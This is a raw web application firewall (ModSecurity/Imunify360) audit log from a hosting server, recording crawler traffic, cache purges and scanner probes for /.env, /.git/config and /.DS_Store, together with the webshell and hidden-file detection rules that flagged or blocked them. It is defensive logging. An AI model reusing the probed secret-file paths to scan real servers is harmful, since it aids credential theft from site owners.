(KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --dc035374-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --dc035374-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/rajasthan-tours-from-jaipur/images/aainag/aainag/js/aaina/1/images/testimonials/js/festivals-calendar.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751276710356614 53694 (- - -) Stopwatch2: 1751276710356614 53694; combined=3143, p1=165, p2=2781, p3=0, p4=0, p5=196, sr=50, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --a9db8b0d-Z-- --a2cf991d-A-- [30/Jun/2025:15:15:12.020363 +0530] aGJcnvGqF1yXwJaRpriIdwAAAA0 103.185.74.40 51458 192.168.74.40 443 --a2cf991d-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --a2cf991d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --a2cf991d-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751276702215372 9805394 (- - -) Stopwatch2: 1751276702215372 9805394; combined=3539, p1=147, p2=3228, p3=0, p4=0, p5=164, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --a2cf991d-Z-- --38c57b59-A-- [30/Jun/2025:15:15:13.217416 +0530] aGJco-8vLCNE6Q6vc6J0DQAAAB8 103.185.74.40 36743 192.168.74.40 443 --38c57b59-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --38c57b59-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --38c57b59-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751276707320521 5897495 (- - -) Stopwatch2: 1751276707320521 5897495; combined=2919, p1=109, p2=2640, p3=0, p4=0, p5=169, sr=56, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --38c57b59-Z-- --93edd609-A-- [30/Jun/2025:15:15:14.510228 +0530] aGJcqs1aszZdy4pWyr_gNQAAAAU 20.171.207.232 47512 192.168.74.40 443 --93edd609-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/rajasthan-tours-from-delhi/js/images/js/privacy-policy.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --93edd609-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --93edd609-H-- -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --28dc4572-Z-- --785b3961-A-- [30/Jun/2025:16:02:29.171434 +0530] aGJnvL0-LYxD8fEOwEFJ9gAAADs 157.245.2.32 41384 192.168.74.40 443 --785b3961-B-- GET /.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* Accept-Encoding: gzip --785b3961-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Encoding: gzip Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --785b3961-H-- Message: Access denied with code 403 (phase 2). 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751279548618126 553645 (- - -) Stopwatch2: 1751279548618126 553645; combined=949, p1=110, p2=683, p3=0, p4=0, p5=156, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --785b3961-Z-- --3fb8d63f-A-- [30/Jun/2025:16:02:30.091134 +0530] aGJnvt1FYARPUJaTrtcibgAAABE 20.171.207.232 57438 192.168.74.40 443 --3fb8d63f-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/js/js/images/js/hotels-pushkar.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --3fb8d63f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --3fb8d63f-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/js/js/images/js/hotels-pushkar.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/js/js/images/js/hotels-pushkar.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751279550076566 14713 (- - -) Stopwatch2: 1751279550076566 14713; combined=3213, p1=130, p2=2953, p3=0, p4=0, p5=130, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --3fb8d63f-Z-- --31629b0a-A-- [30/Jun/2025:16:02:30.922745 +0530] aGJnvnFTGXvjyjW5zx4ZEgAAAC8 157.245.2.32 41396 192.168.74.40 443 --31629b0a-B-- GET /.git/config HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* Accept-Encoding: gzip --31629b0a-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Encoding: gzip Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --31629b0a-H-- Message: Match of "rx /wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/backups.min.js" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/002_i360_basic.conf"] [line "12"] [id "77140739"] [msg "IM360 WAF: [RBL] Dirb like fuzzing||MVN:REQUEST_URI||MV:/.git/config||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Message: String match "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "349"] [id "77318034"] [msg "IM360 WAF: Blocked access to git folder||RSV:7.05||RS:0||T:APACHE||MV:/.git/config||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751279550879835 43123 (- - -) Stopwatch2: 1751279550879835 43123; combined=3794, p1=89, p2=3510, p3=0, p4=0, p5=195, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --31629b0a-Z-- --3b5af035-A-- [30/Jun/2025:16:02:31.290971 +0530] aGJnv91FYARPUJaTrtcibwAAABE 20.171.207.232 57438 192.168.74.40 443 --3b5af035-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/js/js/images/js/parks-sanctuary.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --3b5af035-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --3b5af035-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/js/js/images/js/parks-sanctuary.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/js/js/images/js/parks-sanctuary.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751279551276746 14436 (- - -) -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751280291211105 15620 (- - -) Stopwatch2: 1751280291211105 15620; combined=2794, p1=121, p2=2488, p3=0, p4=0, p5=184, sr=53, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --84976115-Z-- --10cf4266-A-- [30/Jun/2025:16:14:51.399173 +0530] aGJqoWsIFWODA-g8zvRMywAAABI 103.185.74.40 56596 192.168.74.40 443 --10cf4266-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --10cf4266-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --10cf4266-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751280289838107 1561543 (- - -) Stopwatch2: 1751280289838107 1561543; combined=2750, p1=229, p2=2288, p3=0, p4=0, p5=233, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --10cf4266-Z-- --16150b01-A-- [30/Jun/2025:16:14:52.384022 +0530] aGJqpJSz5945UOocZnMHewAAAFk 20.171.207.232 56970 192.168.74.40 443 --16150b01-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/Travel-Tips.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --16150b01-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --16150b01-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751280292368027 16144 (- - -) Stopwatch2: 1751280292368027 16144; combined=2990, p1=152, p2=2715, p3=0, p4=0, p5=123, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --16150b01-Z-- --a1c63a53-A-- [30/Jun/2025:16:14:53.033061 +0530] aGJqowXezhjJpVloWYQ87QAAAAI 103.185.74.40 5892 192.168.74.40 443 --a1c63a53-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --a1c63a53-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --a1c63a53-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751280291608216 1425303 (- - -) Stopwatch2: 1751280291608216 1425303; combined=3312, p1=106, p2=3001, p3=0, p4=0, p5=204, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --a1c63a53-Z-- --fde6a30b-A-- [30/Jun/2025:16:14:54.760169 +0530] aGJqppSz5945UOocZnMHfQAAAFk 20.171.207.232 56970 192.168.74.40 443 --fde6a30b-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/Distance-Chart-Rajasthan.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --fde6a30b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --fde6a30b-H-- -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --2b0ba674-Z-- --e8c87460-A-- [30/Jun/2025:16:21:12.595008 +0530] aGJsIHA1bJj51dVnlb9_JQAAADE 192.253.209.86 15953 192.168.74.40 443 --e8c87460-B-- GET /.git/config HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept-Encoding: * Accept: */* Connection: keep-alive --e8c87460-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --e8c87460-H-- Message: Match of "rx /wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/backups.min.js" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/002_i360_basic.conf"] [line "12"] [id "77140739"] [msg "IM360 WAF: [RBL] Dirb like fuzzing||MVN:REQUEST_URI||MV:/.git/config||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Message: String match "/.git/" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "349"] [id "77318034"] [msg "IM360 WAF: Blocked access to git folder||RSV:7.05||RS:0||T:APACHE||MV:/.git/config||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751280672550455 44931 (- - -) Stopwatch2: 1751280672550455 44931; combined=3482, p1=84, p2=3218, p3=0, p4=0, p5=179, sr=51, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --e8c87460-Z-- --b82d0129-A-- [30/Jun/2025:16:21:12.712455 +0530] aGJsIHlYJ9hwaTEGCmB7-AAAAAA 20.171.207.232 42430 192.168.74.40 443 --b82d0129-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/aainag/aainag/js/large.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --b82d0129-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --b82d0129-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/aainag/aainag/js/large.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/aainag/aainag/js/large.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751280672696079 16693 (- - -) -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --95ac250c-Z-- --3c517a4b-A-- [30/Jun/2025:16:21:15.242489 +0530] aGJsI1R_wtNLnY2uQolOuQAAAAE 192.253.209.104 7211 192.168.74.40 443 --3c517a4b-B-- GET /.DS_Store HTTP/1.1 Host: 103.185.74.40 User-Agent: python-requests/2.32.3 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive --3c517a4b-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Encoding: gzip Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --3c517a4b-H-- Message: Match of "rx /wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/backups.min.js" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/002_i360_basic.conf"] [line "12"] [id "77140739"] [msg "IM360 WAF: [RBL] Dirb like fuzzing||MVN:REQUEST_URI||MV:/.DS_Store||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751280675197148 45800 (- - -) Stopwatch2: 1751280675197148 45800; combined=3431, p1=81, p2=3137, p3=0, p4=0, p5=212, sr=50, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --3c517a4b-Z-- --df311717-A-- [30/Jun/2025:16:21:15.611015 +0530] aGJsHcrsqADc0ksUEO1GjwAAABo 57.141.0.27 42542 192.168.74.40 443 --df311717-B-- GET /product-tag/georgette/?filter_color=blue%2Cred%2Corange%2Cgreen%2Cyellow&query_type_color=or&filter_size=xl%2Cl%2Cxxl&query_type_size=or HTTP/1.1 Accept: */* User-Agent: meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) Host: thecouturelove.com Connection: keep-alive --df311717-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Link: <https://thecouturelove.com/wp-json/>; rel="https://api.w.org/", <https://thecouturelove.com/wp-json/wp/v2/product_tag/326>; rel="alternate"; title="JSON"; type="application/json" Vary: Accept-Encoding,User-Agent Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --df311717-H-- Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G:filter_color=blue,red,orange,green,yellow&query_type_color=or&filter_size=xl,l,xxl&query_type_size=or& P: F:||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --3a6e5964-Z-- --6f975970-A-- [30/Jun/2025:16:22:19.093324 +0530] aGJsYjA1GQQmfaJnR0hFSgAAABw 192.253.209.100 13299 192.168.74.40 443 --6f975970-B-- GET /.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept-Encoding: * Accept: */* Connection: keep-alive --6f975970-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --6f975970-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751280738548058 545331 (- - -) Stopwatch2: 1751280738548058 545331; combined=734, p1=84, p2=525, p3=0, p4=0, p5=125, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --6f975970-Z-- --a65bc220-A-- [30/Jun/2025:16:22:19.662180 +0530] aGJsY3lYJ9hwaTEGCmB8MQAAAAA 20.171.207.232 42430 192.168.74.40 443 --a65bc220-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/aainag/images/hotels-bharatpur.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --a65bc220-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --a65bc220-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/aainag/images/hotels-bharatpur.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
